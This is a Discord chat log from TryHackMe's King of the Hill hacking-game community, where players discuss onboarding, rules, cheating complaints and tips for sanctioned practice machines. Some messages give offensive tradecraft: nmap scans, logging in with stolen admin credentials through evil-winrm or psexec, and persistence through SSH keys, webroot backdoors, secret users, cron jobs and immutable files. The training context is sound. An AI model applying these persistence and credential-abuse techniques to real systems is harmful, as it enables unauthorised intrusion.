we doin VC for this or just text?
#koth
civic spade
fair adder
lets' do text
civic spade
sounds good
fair adder
i got the music loud
civic spade
same
fair adder
banging super loud lmao
our neighbors just moved out a couple days ago so we have music up loud today lol
civic spade
ok so how do we do this? im a nooby here
civic spade
i do not, i got nothing
fair adder
or are you using the attack box?
civic spade
i got an attack box
fair adder
you can also use the attack box
usually much faster
i will send link
and just join from there
civic spade
sounds good
fair adder
okay
first things first
go to your profile and click on your profile settings
your profile looks like this
click on the circle and then click on profile
civic spade
ok i am there
fair adder
then click on "About You"
civic spade
got it
fair adder
then scroll down at the bottom and set yourself up as "Intermidiate"
civic spade
done
fair adder
okay you might need to logout and log back in to take effect
ill send you the link now
civic spade
joined
fair adder
i c u
okay
so
i am not going to go in depth with all the tools we are going to use just the main basic ones
first is NMAP
civic spade
checks ports and such on a network
fair adder
to activate this just simply type "nmap" in your terminal
fair adder
checks ports and such on a network
correct
civic spade
done
fair adder
the very first thing you ever want to do is google dork information about the network or system you are hacking. Then once you have a specific target (network or system) you then want to use a scanning tool like NMAP to see the ports and services it has running
In KOTH however, you want to immediately start without your scanning tools
civic spade
ok i think i follow
fair adder
I personally start with nmap and gobuster and then I drop the IP into my browser
so go back to the page and you will see our IP addresss
which is our target
so i will copy and paste this into my browser and then run nmap
civic spade
listed under machine details ya?
fair adder
listed under machine details ya?
corre ct
civic spade
ok i got you
fair adder
fair adder
ok i got you
copy and paste it into your browser and then hop on your attack box and run this command: nmap -A -sC -vv -p- IP ADDRESS
fair adder
i assume we have different numbers in those last 3 digits?
no i cropped it out
so i don't get in trouble for pasting the entire ip address
i don't know the rules on this specifically yet
civic spade
oooh ok
fair adder
okay that means that it's not accecessible
so we need to hack it
we can use our nmap results to start there
let's see what our nmap results say
civic spade
wait i think i tripped up. i didnt run that nmap -A command
fair adder
okay so go to your attack box and run: nmap -A -sC -vv -p- IP ADDRESS
this nmap command has a couple switches that will get us some particular results we want
for instance i ran this already and found that 5 ports are open
civic spade
no spaces in that?
civic spade
ok 2 seconds
civic spade
ok success! dyslexia was kicking in for a moment
civic spade
no rush
civic spade
man im sorry, im dipping out of this. my mood kinda got killed. i'll be up for playing again once i've learned more
fair adder
You're good ! just remember learn at your pace and silence the outside 😋
civic spade
really feeling that emphasis on that outside bit
fair adder
don't put too much thought ! let's hack our way out of this lol im running nmap right now to see more results i can send you a spectator link so you can just watch but it won't do you much as learning rooms on your own here on THM will benefit you more
stiff egret
thanks @fair adder
sour vectorBOT
Gave +1 Rep to @brazen atlas
stiff egret
just adding you to the reps 
nova tide
M R . H O L M E S
weary axle
ya cause naughty has exams 365*24
stiff egret
**M R . H O L M E S**
hey guy tofu
nova tide
ya cause naughty has exams 365*24
Recently competed in a local hackathon
stiff egret
oooooooooooooooof
placid fable
os? shd heve been op
Always release your locks 😄
What say you Naughty?
graceful oriole
Hii everybody
wide gate
Hii everybody
hi
stiff egret
Hi
wicked shard
Anyone wanna play?
steep agate
Hi
jaunty gyro
Who is playing?
stiff egret
Might, if there are enough players, no fun with 2-3 peeps
steep agate
Who is playing?
Yeah
jaunty gyro
Might, if there are enough players, no fun with 2-3 peeps
gg
weary axle
new machine pls
graceful fable
anyone wana play koth
distant coral
Anyone want to schedule a koth for the weekend
wicked shard
Sure
distant coral
Saturday, 5PM CST?
graceful fable
Hii everybody
yo bro how did you patch the box 🙂
locked me out
i accidently closed my nc reverse shell
distant coral
My internet went down 3 seconds before the KoTH started
kind otter
lucid salmon
@restive terrace hi
elfin bronze
<@!99992370187075584> hi
are you there ?
lucid salmon
are you there ?
What the heck did you to the king file
lucid salmon
what a nasty bro
elfin bronze
hahha
wicked shard
anyone up for a game?
wanton wren
yes
wanton wren
lol there are 8 people in the game XDDD
nova tide
The more the merrier ☺️
steep agate
distant coral
I am once again requesting to play koth
full bobcat
hidden barn
lucid salmon
@steep agate hey
distant coral
I’d also like to know how he is balling on me rn
lucid salmon
Looks like you pwn machines fast
lucid salmon
I’d also like to know how he is balling on me rn
I dont understand this ^^
distant coral
As in what I’m saying or how he is being god
steep agate
<@!745672959804571742> hey
yo
steep agate
Looks like you pwn machines fast
which machine?
distant coral
The one you’re on rn lol
steep agate
I’d also like to know how he is balling on me rn
I didn't understand, what do you mean?
distant coral
You kinged in 4 minutes while I haven’t even found anything that looks mildly promising
steep agate
There are no mysteries, it's very simple, when you make the machines and it falls again you already know the way, this is quite obvious. @distant coral
distant coral
What
steep agate
What
uh, if you've ever made a koth machine, and that machine is chosen again, you know how to root, that's pretty obvious...
do not you think?@distant coral
distant coral
So you already did this machine once
steep agate
So you already did this machine once
Of course, I've won 216 times
distant coral
This was my first koth
steep agate
oh, okay
lucid salmon
This was my first koth
Ahhh broo...
Its normal
when you do koth machines more than 1 time, you know how to pwn
steep agate
Its normal
yes
distant coral
Wait you did two koths at the SAME TIME
steep agate
when you do koth machines more than 1 time, you know how to pwn
that's what I meant, thank you very much
sour vectorBOT
Gave +1 Rep to @lucid salmon
steep agate
Wait you did two koths at the SAME TIME
yes me when i got the king i went to another match, is there a problem with that?
distant coral
That just makes me feel worse
steep agate
It's not my fault, I'm just playing koth and distracting myself, as soon as I put my nick on the king, I go to the next game, and I don't see any problem with that...
lucid salmon
Holy crap
Im king
@steep agate
Im so noob in windows koth xD
Nice game everybody
Russia Wins
lucid salmon
What med is?
graceful oriole
Niko are you here?
distant coral
How do you upgrade from a user powershell? I got the admin password but I don't know how to log in as them.
lucid salmon
How do you upgrade from a user powershell? I got the admin password but I don't ...
getting a shell with evilwinrm or psexec
and putting the creds
lucid salmon
I tried psexec but it wouldn’t work
so evilwinrm
#feedback-and-ideas @thm you should rotate the machines btw, is bored make the same machines all time :/
@hushed palm what is wrong with ya photo man?
short tusk
Well, not only do we have limited machines, but you have access to all the machines.
So, if we added a rotation, you would be restricted by the machines and I think that would be more boring
lucid salmon
Well, not only do we have limited machines, but you have access to all the machi...
Right...
steep agate
Hey bro, can I give you an idea for koth's top 10? it would be really cool if there was some kind of reward for these 10 players, after all +100 wins is a lot, it takes time, so with some kind of reward, it would encourage more players to play KoTH
steep agate
what bad luck hahahaha
it's actually quite simple, to get a shell it's not that complicated
lucid salmon
Well was a nice koth, im so noob in windows yet
@steep agate you are good, I admit that
steep agate
Well was a nice koth, im so noob in windows yet
it was a good koth i admit xD
steep agate
<@!745672959804571742> you are good, I admit that
thanks!! you are good too
sour vectorBOT
Gave +1 Rep to @lucid salmon
lucid salmon
@steep agate nice game, im going to feed myself
lucid salmon
lucid salmon
Hi @tacit locust @fair adder
fair adder
hi
lucid salmon
Is someone Dosing me? 
lucid salmon
Is someone Dosing me? <a:reegun:623335446277259285>
kekw I forgot use ovpn
steep agate
@lucid salmon
lucid salmon
Hi
covert surge
Can anyone provide hints for KOTH H1:Hard machine
placid fable
Can anyone provide hints for KOTH H1:Hard machine
Where are you currently?
Have you got RCE?
steep agate
Can anyone provide hints for KOTH H1:Hard machine
H1 Hard machine is easy...
steep agate
in the Food machine i foind 6 flags but cant find last 2
grep -rli "thm{" / 2>/dev/null
elfin bronze
done something similiar to that is it different ? i used grep -rnw . -e 'thm{[0-9,a-z]*}' for every directory manually xD
gilded orchid
Hi, so I am doing koth for first time, the ip is not responding and no one has submitted any flags ?
stiff egret
Are you connected to VPN?
humble girder
On the H1: easy box there is a secret.txt binary file of 256 bytes. Has someone be able to figure out what that is?
brittle galleon
i wanna report this dude, he plays with 2 accounts and he keeps resseting the room
nova tide
i wanna report this dude, he plays with 2 accounts and he keeps resseting the ro...
please provide more detail and email to koth@tryhackme.com. (Suspected players, Game url, screenshots)
humble girder
I can confirm that somewhat. He seems to have documented for himself how to get in quick (which is not illegal) but if you patch that vulnerability he immediately requests for a reset. Don’t know if he plays with 2 accounts.
humble girder
🙂 Me neither. offtopic But to be honest, if you have done these machines several times it ruins the experience for those that just started out. I don't have a solution for this - I guess limiting the amount of times you can join a game to hack the same machine is too harsh. But for every machine, I wrote a readme that explains how to get in and how to patch the vulns. Especially when being root, you can basically analyze the machine and find all the vulns more easily. I guess we have to rely on the fact that it becomes boring to do the same tricks all the time 😄
graceful oriole
Can i ask there about hogwarts room?
graceful oriole
i've a question about hogwarts room, how can i use the page that ask about three gift?
placid fable
i've a question about hogwarts room, how can i use the page that ask about three...
There are 3 horcruxes hidden on the target machine, if you find them and enter those into the prompt asking for 3 gifts you will get access as root
If you have to ask, you will never know
If you know, you need only ask
😄
stiff egret
There are *3 horcruxes* hidden on the target machine, if you find them and enter...
Alright I have to say, Impressed with the last quote. room of requirement is a hint in itself
cursive belfry
Can beginner players who just created an account join my private game?
stiff egret
Yes, make sure they have set the level on professional iirc in the profile settings
You can even play at level 1. The least thing you need is to set your experience level to intermediate/advanced in your profile.
hushed sundial
https://tryhackme.com/games/koth/join/3f4101dd7942082ef5546c81
if anyone is down for the Hackers KOTH box; would be one of the few I haven't tried before 🙂
lyric apex
These look like a lot of fun. I watched a youtube video with what was possibly Seth Rogen doing one and it was fantastic
opal dove
These look like a lot of fun. I watched a youtube video with what was possibly S...
@woeful sundial 😅
lyric apex
Learned a lot from that video!
graceful oriole
There are *3 horcruxes* hidden on the target machine, if you find them and enter...
Thanks for the answer, yeah but i mean how can i give to her?
sour vectorBOT
Gave +1 Rep to @placid fable
placid fable
Thanks for the answer, yeah but i mean how can i give to her?
To whom?
Isn't there a service listening on one of the ports?🤔
wind fjord
Thanks for the answer, yeah but i mean how can i give to her?
Use netcat or telnet to connect to the service
shadow pivot
graceful oriole
@placid fable @wind fjord tanks for the advices, the next time i'll try
wind fjord
I've only played Hogwarts like twice, but I'm pretty sure there are better ways to get in than that tbh
iron cloud
fair adder
Wanna play koth? https://tryhackme.com/games/koth/join/11f6ffebb9ecd37103f12ac5
wind fjord
where'd you go :(
fair adder
spiral canyon
vapid dragon
is ther any alteernate method to gain access in carnage on KOTH ??
nova tide
is ther any alteernate method to gain access in carnage on KOTH ??
There are more than one in each machine.
limber rune
Is there a way to regain access after being kicked off a box?
wind fjord
to be good at koth you can't just root the box, you have to patch stuff and create ways for yourself to get back in
- Create SSH keys
- Leave a backdoor in the webroot
- Create a new user that only you know the password to
- Cron jobs
there's a whole lotta stuff you can do and experiment with
fair adder
woaw
fair adder
- Create SSH keys
- Leave a backdoor in the webroot
- Create a new user that onl...
even me I don't do all of this
I should
vapid dragon
even me I don't do all of this
i just wnat to ask how fast can you patch man ??
how
fair adder
Dépend of the vuln
vapid dragon
i just want to say that you r tooooo fast man
nova tide
Is there a way to regain access after being kicked off a box?
there's also a room on backdoors/setting persistence on THM.
vapid dragon
I would like to be the top 1 this month
all the best
fair adder
Ty
fair adder
there's also a room on backdoors/setting persistence on THM.
Wich room?
nova tide
Wich room?
fair adder
Ty
sour vectorBOT
Gave +1 Rep to @nova tide
fair adder
I willcheck the rrom
limber rune
there's also a room on backdoors/setting persistence on THM.
Ty. I will check out the room
limber rune
Um
near raft
Thank you!
sour vectorBOT
Gave +1 Rep to @nova tide
near raft
I haven't tried KotH as yet always backed out but do you always get the same machine/vulnerabilities or is there rotation etc..?
Are all machines Linux or we also have Windows machines in there?
lucid salmon
I've made a KoTH writeup
https://github.com/SDToropov/Tryhackme_KOTH/blob/main/Shrek.md
vapid dragon
I've made a KoTH writeup
https://github.com/SDToropov/Tryhackme_KOTH/blob/main/S...
noice but instead i think you can edit /etc/sudoers with vim and force write it
i think
lucid salmon
noice but instead i think you can edit /etc/sudoers with vim and force write it
Im checking this, thanks ^^
sour vectorBOT
Gave +1 Rep to @vapid dragon
fair adder
I've made a KoTH writeup
https://github.com/SDToropov/Tryhackme_KOTH/blob/main/S...
Wow nice format! How do you make those...you know...'text inside shell pictures'? Are they just screencaps or some software to generate them?
fair adder
I've made a KoTH writeup
https://github.com/SDToropov/Tryhackme_KOTH/blob/main/S...
What made you go to mysql first once you had a ssh shell?
lucid salmon
What made you go to mysql first once you had a ssh shell?
I've made that machine a lot of times, I know the way
terse willow
(Be aware that images of code are an awful accessibility practice though)
And images of text generally, for that matter
lucid salmon
(Be aware that images of code are an *awful* accessibility practice though)
You mean is better using text?
terse willow
You mean is better using text?
Yeah.
Better for people with disabilities who may use something like a screenreader.
lucid salmon
I'm inspired in Tryhackme Rooms, I like a lot the design
fair adder
A write up is a way reproduce your work
lucid salmon
But youre right, next time i'll make something better, that was my 1st writeup ever
fair adder
You did an awesome job!
lucid salmon
Thanks! ^^
lucid salmon
noice but instead i think you can edit /etc/sudoers with vim and force write it
You mean edit as root?
I edit that when im root, but only for patch the sudo permission for donkey
nova tide
You mean edit as root?
||Try editing that as a normal user||
lucid salmon
||Try editing that as a normal user||
Permission denied
nova tide
Permission denied
then you can't i guess.
lucid salmon
then you can't i guess.
I think so
lucid salmon
sheesh im not able to find a way to get root via the skidy homework_project in Production machine...
vapid dragon
Not sure tho
lucid salmon
Yeaj
I know that way, but I saw that the skidy dir has a suid file
Homework_project
nova tide
No spoilers
vapid dragon
No spoilers
okey
fair adder
Idea:
Two teams.
Two boxes
Attack/Defend war game.
Try to root the other teams box and patch your own before getting rooted.
@nova tide @stiff egret
nova tide
Idea:
Two teams.
Two boxes
Attack/Defend war game.
Try to root the other teams...
Thanks that's a good idea, will take into consideration and discuss in the upcoming machines. 
sour vectorBOT
Gave +1 Rep to @quaint bough
fair adder
My bad, didn't see you were online
I think it will promote more of a community interaction and promote friendly competition
You could even do a ladder if you have enough teams sign up
fair adder
man I want to get into these kind of exercises, attack/defend, so badly but after reading that autopwn script 👀
is there skill based match making or something like that here?
I feel like I would react like the zootopia sloth once I get a hold
fallow heart
Starting in 15': https://tryhackme.com/games/koth/join/79ca3acd0a831df1a102aeb7
wind fjord
is there skill based match making or something like that here?
There is no skill based match making, but if you're worried about getting absolutely rolled, you can always try and put together a lobby of people who are new to KOTH
It's what I did my first few times playing
The Food and Hackers boxes are both available as their own independent rooms if you want to lab out some persistence, or just get a feel for the game
also I believe autopwn scripts are not allowed to actually be used in game
fair adder
The Food and Hackers boxes are both available as their own independent rooms if ...
thanks!! will check them out
sour vectorBOT
Gave +1 Rep to @wind fjord
wind fjord
1 hour
lyric apex
Oh nice
pseudo depot
Public KOTH games starting in 9m30s
https://tryhackme.com/games/koth/join/78835518d67ddcdb35323d27
fallow heart
graceful oriole
Anyone know that the cms on shrek machins is hackerable?
vapid dragon
Anyone know that the cms on shrek machins is hackerable?
be clear vro
desert chasm
I'm kinda new to this, how advanced should one be for koth? Is there some easier ones to start with, or maybe team based ones where one can learn from other more experienced team members?
vapid dragon
I'm kinda new to this, how advanced should one be for koth? Is there some easier...
do some CTF rooms and search for their writeups you'll get the idea
desert chasm
already did a few CTF, still feels a bit scary to directly go for koth 👀
broken berry
you wont know until you try
desert chasm
so to answer my question, I guess then there is no such thing as beginner-koth games or team based ones where you can learn from other team members?
nova tide
so to answer my question, I guess then there is no such thing as beginner-koth g...
No there isn't any. You can always try the stand alone on koth rooms on tryhackme(Food and Hackers). You can also make private games to practice if you had like.
desert chasm
No there isn't any. You can always try the stand alone on koth rooms on tryhackm...
Thanks!
sour vectorBOT
Gave +1 Rep to @nova tide
hollow narwhal
anyone for Koth
hollow narwhal
anyone did carnage koth
vapid dragon
anyone did carnage koth
nova tide
see <#913504375303962675>
There's also a machine named carnage in KoTH. They aren't the same machines.
vapid dragon
There's also a machine named carnage in KoTH. They aren't the same machines.
i thought they were the same
nova tide
stop typing holmes
stiff egret
ghosting your msgs 
vapid dragon
anyone did carnage koth
i only know 1 method
hollow narwhal
i only know 1 method
WHAT IS THAT
nova tide
WHAT IS THAT
you gotta find that out yourself 😛
hollow narwhal
im in hell
nova tide
lyric apex
I recommend anyone who wants to koth just jump in and play I did it for the first time last night and it was a lot of fun
lavish hedge
who's up for a game??
brittle ingot
On the KOTH screen, where is the option to get to the AttackBox?
terse willow
On the KOTH screen, where is the option to get to the AttackBox?
https://tryhackme.com/my-machine should always work 🙂
brittle ingot
awesome! Didn't know about this page in the app. Thank you
terse willow
Np
lyric apex
got a lobby open if anyone is interested
quiet schooner
<https://tryhackme.com/my-machine> should always work 🙂
I think they were trying to deprecate it
terse willow
<a:kekww:662170920521302023> I think they were trying to deprecate it
Tough 
pine raft
Anyone is in King of the Hill
vapid dragon
Anyone is in King of the Hill
yea
flint karma
Does anyone want to play KOTH?
atomic heart
Hi i'm wondering is editing /etc/hosts.allow and /etc/hosts.deny legal ?
wind fjord
Blocking IPs is not allowed if that’s what your plan was
atomic heart
Oh thx!
nova tide
Hi i'm wondering is editing /etc/hosts.allow and /etc/hosts.deny legal ?
you can read rules.
solar wagon
in king of the hill rooms are you allowed to change password for users?
vapid dragon
in king of the hill rooms are you allowed to change password for users?
yes
fair adder
im going to try king of the hill for the first time
nova tide
im going to try king of the hill for the first time
Good luck, Have fun
fair adder
I had to go before I could complete it
fair adder
Is there a way to know which "box" spawned for king of the hill? And how often do they spawn
nova tide
Is there a way to know which "box" spawned for king of the hill? And how often d...
They spawn at random from the pool.
Name of the box appears one minute before the game starts.
placid fable
i dont see where the name of the box is?
It appears, 1 minute before the KOTH starts, near the top-right just below the <MACHINE-IP>
wraith bough
Hello 👋
fair adder
whats up
fair adder
Sup guys
quiet schooner
@fair adder Please keep it in English only here, this is part of Rule 8
fair adder
https://tryhackme.com/games/koth/join/f7093aa53e3433142a6aa474
Machine: Tyler (Linux)
I've never played on it, I don't know the flags or the way to root access.
Whoever enters do not look at walktroughs.
fair adder
How is everyone’s day
stiff egret
it's FRAYDAYYYY
stiff egret
it's 3:16 AM of Friday in my location
stiff egret
ah, that makes sense
fair adder
What’s your thm profile ?
fair adder
ah, that makes sense
Ye
stiff egret
/p/holmes
fair adder
Just holmes?
stiff egret
just holmes
fair adder
Oh, I’m pretty sure I’ve seen you on the leaderboards
stiff egret
do I know you 👀
fair adder
do I know you 👀
Nah
Me thm profile is
We could’ve been in the same koth game before
stiff egret
yeah, possible
nova tide
fair adder
Oh sorry I may have spoiled it
nova tide
yes 🙂
naive goblet
shadow thought it stood for king of the ham
nova tide
Just change your name to Haughty.
does this count?
fair adder
haha
sonic belfry
Or change it to jndiana Jones.
nova tide
what would that mean? 😄
sonic belfry
jndi:
fair adder
naughty look at my message
nova tide
you need to put your name in that file to get 10 points every minute
site takes your name from king.txt and gives you points.
!docs koth
pearl gladeBOT
TryHackMe
nova tide
Give that a read in your free time ^
Also a blog post linked within for some tips
It's also written on KoTH page:
Add your TryHackMe username to /root/king.txt
The longer you're king, the more points you get```@fair adder You can ask me anything you like in here too 🙂
fair adder
alright
nova tide
Try looking up for chattr binary. man chattr would help.
steep agate
👀
terse willow
-unmute 795326240285917234 As a heads up: there are currently 109,351 people in this server. Believe it or not, they don't all want to play KoTH with you, so it comes across as incredibly arrogant that you think pinging everyone in the server is a suitable course of action.
It's also mildly insulting that you think we would be stupid enough to let you do so, and, as you've already found out, the bot doesn't appreciate you doing it very much either 🤷♂️
sour vectorBOT
🔊 Unmuted Mr.Niko#0395
wise light
is anyone going to reset the box
fair adder
hi
mighty vault
oh, that joins me to the game? uh ok guess ill give it a shot 😛
mighty vault
so on a windows box that doesnt have /root/king.txt ?
fair adder
maybe C:\Users\Administrator
mighty vault
heh, i guess that file in Shares/King/king.txt is not the right one then 😛
mighty vault
yeah just got those creds
mighty vault
i suck at windows 😛
fair adder
There might be an easier way to get in
mighty vault
got 3 accounts, scarra, fed, and poki
mighty vault
wait lol how did you get it so fast, like 5 minutes after i joined the room you were king
mighty vault
🙂
mighty vault
yeah the fact that i am very weak with windows is not helping 😛
fair adder
I'l give you a hint the last 2min how i get in... 😆
mighty vault
lol
on of the ports had text freakyyyyy i thought it was a passwrd lol probably something you did
fair adder
bXMxN18wMTA= 
fair adder
on of the ports had text freakyyyyy i thought it was a passwrd lol probably some...
that's my username haah
mighty vault
oh wow, such an old exploit i never would have thought...
yeah i def need to step up my windows game
that wsa fun though, surprised i managed to find 2 flags
fair adder
good luck mate 🙂
sour vectorBOT
Gave +1 Rep to @bright radish
nova tide
https://tryhackme.com/games/koth/36849
That's a spectator link, you need to share invite link for people to join.
nova tide
<@267010557889085440> wanna play a private koth game
It's 5 am. I was about to sleep
I have a class to attend at 09:30
vocal shell
No worries get some rest
nova tide
Maybe later?
vocal shell
Sure
nova tide
Ping me whenever you want to play later i will jump in.
mighty vault
ping me as well later, im down 🙂
lyric apex
RFS if here - did you remove e2fstools? Or where did you hide chattr? Curious
Gg either way
nova tide
RFS if here - did you remove e2fstools? Or where did you hide chattr? Curious
you can always upload your own chattr binary?
lyric apex
you can always upload your own chattr binary?
Does@the binary stand on its own? I uploaded the one from my kali but was throwing errors
Seemed like the whole package was gone, but maybe I just need to use busybox if that’s the case
placid fable
Does@the binary stand on its own? I uploaded the one from my kali but was throwi...
Use a static binary compatible with the target machine 😄
lyric apex
Use a __static__ binary compatible with the target machine 😄
Yes, I’ll have to download the source and compile one so I can be more prepared next time I suppose
placid fable
Yes, I’ll have to download the source and compile one so I can be more prepared...
Here is one I found 😄
You can set your username in the program so whoever uses it will write your username 😆
# this should work
gcc --static chattr.c -o chattr
Thanks!
lyric apex
I was so tilted lol, there was no way I was winning but I got a root shell with 5 mins left and couldn’t get on the board
Just how it goes
brittle flicker
lyric apex
It’s a program that makes a file immutable so even root can’t change it
fair adder
Sup guys
nova tide
Here is one I found 😄
You can set your `username` in the program so whoever use...
You can also download static binaries from busybox.
lyric apex
I was salty at first but getting into the box is really just getting in the ring
Gotta throw some punches
nova tide
I was salty at first but getting into the box is really just getting in the ring
The real battle begins after getting root.
lyric apex
Mike Tyson quote applies: “everyone has a plan until you get punched in the mouth”
rocky geode
The real battle begins after getting root.
Let's play?
nova tide
Let's play?
Sorry i fell asleep and just woke up.
lyric apex
I am working on some armaments for revenge mortal kombat
lyric apex
gg
rocky geode
I am working on some armaments for ~~revenge~~ mortal kombat
Mortal Kombat? 
kindred prairie
anyone up for koth?
narrow acorn
Hello,
Can wild card exploit work for mv command also?
echo socket
kindred prairie
empty pelican
kindred prairie
https://tryhackme.com/games/koth/join/36a7d4571cd526fe01e37224
Thats really tough man
glacial leaf
@brittle galleon
brittle galleon
empty pelican
kindred prairie
kindred prairie
ebon lichen
Hi @nova tide, it's been a while, hope you are well 🙂 I am keen to share experiences on some of the KotH boxes, are you open to discuss via DM?
nova tide
Hi <@!267010557889085440>, it's been a while, hope you are well 🙂 I am keen to ...
sure you can DM. Might be a bit late to respond though.
ebon lichen
sure you can DM. Might be a bit late to respond though.
No worries, it is mid-night here - about time to retire. Good to connect!
glass parrot
Someone come play KOTH
placid fable
https://tryhackme.com/games/koth/37395
This isn't an Invitation link but a spectator link instead
So, if you want fellow users to hop in your game; you may want to share the Invitation link
rotund smelt
hey there, what this does mean 'Uh-oh! Only intermediate and advanced experienced leveled users can play King of the Hill.' ... <script src="https://tryhackme.com/badge/5824"></script>
oops , this is my profile badge
hoary rover
Change it from beginners to intermediate or advance frok your profile
stiff egret
Change your level like this to be able to play KoTH.
Anywhere from Intermediate to Advanced would do.
stiff egret
Change your level like this to be able to play KoTH.
Anywhere from Intermediate...
@rotund smelt
rotund smelt
<@!905364746524590081>
Thanks alot
sour vectorBOT
Gave +1 Rep to @stiff egret
glass parrot
Would getting flags after a minute the game has started signify cheating?
Because by that time the nmap scan either hasn't finished or says that the host isn't up yet
prisma roost
That is a very big problem with koth because not only are the flags same but after solving a machine one or two times, anyone could write a script that takes you to root in no time at all
stiff egret
Because by that time the nmap scan either hasn't finished or says that the host ...
Actually, since the flags are static, and same everytime, people store previous flags.
It is not a gentlemen's way of playing, but yes, it is also not cheating.
stiff egret
That is a very big problem with koth because not only are the flags same but aft...
AutoPwns are specifically not allowed in KoTH, it's a shady area to talk upon, but as said, it's a learning game and cheating in this, you are cheating with yourself.
The flags issue exists and as far as I know, some work is going on to improve that.
prisma roost
koth is only really fun if it's everyone's first time doing the machine imo
stiff egret
Agreed, OR if everyone decides to play fair, i.e. private matches, and then it's a race for king. Which imo is a fun thing to do.
prisma roost
Agreed, OR if everyone decides to play fair, i.e. private matches, and then it's...
I liked playing koth games but it quickly got boring because I'd subconsciously memorised all the steps
stiff egret
It's a game, it's not about who hacks first, it's about if you had fun kicking them offf the machine, or if you heard them shouting in voice chat when you urandom'ed or nyancat'ed their machine.
It's about hacking alright, but tryhackme.com/games/koth
prisma roost
It's a game, it's not about who hacks first, it's about if you had fun kicking t...
Yeah one time a user piped some mean text in my terminal session
Had to kill the session but fun indeed
stiff egret
Yes, that both teaches stuff and makes you laugh out loud at the same time.
It's way more fun if everyone is in vc, because then you hear the shouts and see that your bomb landed 😆
prisma roost
🙂
glass parrot
Actually, since the flags are static, and same everytime, people store previous ...
Ohhh that makes sense
empty pelican
fair adder
.
obsidian current
.
cosmic needle
.
nova tide
@stiff egret you wanna fight? xD
sour vectorBOT
Yes
stiff egret
lmao
nova tide
bot wants you ded i guess
sour vectorBOT
8Ball <What-to-ask:Text>
Invalid arguments provided: Not enough arguments passed
stiff egret
-8ball is naughty cracked?
sour vectorBOT
Yes
stiff egret
I mean look at the odds
nova tide
yeah keep deleting the messages like no one will know.
stiff egret
dude
silent scaffold
what do you guys use to find flag ? Because i got root on Fortune and run different command (grep -Ri thm 2>/dev/null
find / -name flag 2>/dev/null, and many more...) But i can 't find the last 2 flags...
stiff egret
Some flags are specifically harder to find as they also hold more points. Same regex will not work for all.
Plus some flags might not be in standard format, in some machines flags are base* encoded to make it harder to find. Try to check locations that an attacker would think they'll find juicy files. Most likely flags are placed in practical places. But eh well, creators can be evil and hide flags particularly to make it very complex. In that scenario, the points are also very high.
Long story short, it's random.
safe escarp
wind fjord
juun's relative? 🤔
steep agate
lol
fresh wyvern
I received the credentials ||neville:#le#zzmns0bxrqcfe53hgg3vw|| in the hogwarts thm koth however when trying to login via ssh with these values it says incorrect password, can anyone explain this to me I was trying for the whole challenge to get in and ran out of time
I tried cracking the hash using john but it didnt work as it said it wasnt a valid hash
errant marten
I received the credentials ||neville:#le#zzmns0bxrqcfe53hgg3vw|| in the hogwarts...
other players might have changed the password
fresh wyvern
other players might have changed the password
Maybe but i was only against one other player who had 0 flags and 0 king time
stiff egret
I received the credentials ||neville:#le#zzmns0bxrqcfe53hgg3vw|| in the hogwarts...
I don't know if you tried the password in the same game, they change every game.
Other than that, the password is a mix of irritating characters, maybe make sure you are entering it right.
I'd suggest using sshpass -p 'password' to input password. (very bad security practice but eh) this will make sure you are entering the password right.
Plus, as @errant marten suggested, neville's password is fairly easy to get and hence someone might've changed it before you.
rugged leaf
who's Omni or below level that's interested in KOTH?
Signify so i can quickly create a room
I saw this people in the public game, please let me know if y'all active so i dont just waste time please.
unborn anchor
quiet schooner
@fair adder Can you try to only post the invite once for each game please? Walls of links with embeds take up a lot of space
fair adder
@quiet schooner Sorry Not happing Again
nimble lily
good fight @fair adder
fair adder
Thank u
prisma roost
good fight <@456226577798135808>
were you using a bash script to comb for ssh logins and kill the processes with pids or doing it manually?
bright geyser
The second rule says "only stop a service if it can't be patched other way"
That means someone can just take them all down and say I didn't find any other way?
Because I'm doing a Koth right now and at the beginning I saw telnet, ssh, http open but after one guy became king none are available anymore (I did several nmap -p- scans) 😅
nova tide
The second rule says "only stop a service if it can't be patched other way"
That...
if can't be patched. Not if you don't know how to patch it.
If you believe someone broke the rules email at koth@tryhackme.com with some screenshots,game id,suspected person's name.
mild pivot
is it against the rules to kill shell sessions?
happened to me, I mean I won anyway but I was curious
wind fjord
Killing shell sessions is allowed, but spamming/scripting it is not
But people who don't spend time patching will just spam it because that's all they know how to do 🤷♂️
Source: was that person at one point
dim frigate
someone deleted the backup.sh
and no one is voting for reset
@viscid parrot bro
really??
naive goblet
evil play style is evil
prisma roost
really??
"If you believe someone broke the rules email at koth@tryhackme.com with some screenshots,game id,suspected person's name."
copied from a few msgs above
dim frigate
"If you believe someone broke the rules email at koth@tryhackme.com with some sc...
nope he just patched it 
and there's no other way of getting root except that .sh file
and no one is voting for reset
naive goblet
GG
prisma roost
nope he just patched it <:kekwsanta:783452266379476993>
and there's no other w...
baron samedit exploit mostly works for root bcz thm machines have outdated sudo
I believe there's more than one method for root in the machines anyways
nova tide
nope he just patched it <:kekwsanta:783452266379476993>
and there's no other w...
There are atleast 3-4 ways to get root for each KoTH machine
nova tide
and no one is voting for reset
Resets should only be used when the machine is broken not when patched.
ebon lichen
Resets should only be used when the machine is broken not when patched.
I have played fair few games and have yet to see the reset function used as intended. More often than not it smells of frustration and despair 😉
prisma roost
"fair few games"
👀
naive goblet
"fair few games"
👀
does that also count private games??? or only public ones???
prisma roost
does that also count private games??? or only public ones???
dunno if private games award points in the same manner as public ones
private games are a premium feature
naive goblet
if it does someone could easily inflate their points... but would assume that might make them get reported for abuse maybe
prisma roost
if it does someone could easily inflate their points... but would assume that mi...
yeh but that would get noticed pretty quickly I think if someone just starts wining a lot of private games suddenly
naive goblet
indeeds
nova tide
I have played fair few games and have yet to see the reset function used as inte...
You recently started seeing that and i have been seeing that for past 2 years before when it wasn't even in the rules 😄
nova tide
~~private games are a premium feature~~
they are not
nova tide
does that also count private games??? or only public ones???
only public games count.
prisma roost
*they are not*
Ohhh
naive goblet
only public games count.
thanks for the confirmation
sour vectorBOT
Gave +1 Rep to @nova tide
nova tide
You can start a private game as a normal user, but premium users can select the desired machine while others get a random one.
prisma roost
You can start a private game as a normal user, but premium users can select the ...
Ah confused it
kindred prairie
"fair few games"
👀
That dude gained 50 odd points in last 10-15 days
mild pivot
isnt it kind of lame if premium users can select the desired machine..?
it would be easy to just go through and learn all the vulns, build a script to patch them and randomize the order and delay of the patches
it would take maybe 3-5 matches to find them then only an hour or two to make the script lol
I dont know how big the machine pool is though
kindred prairie
it would be easy to just go through and learn all the vulns, build a script to p...
i think this thing already exist autopwner or something
quiet schooner
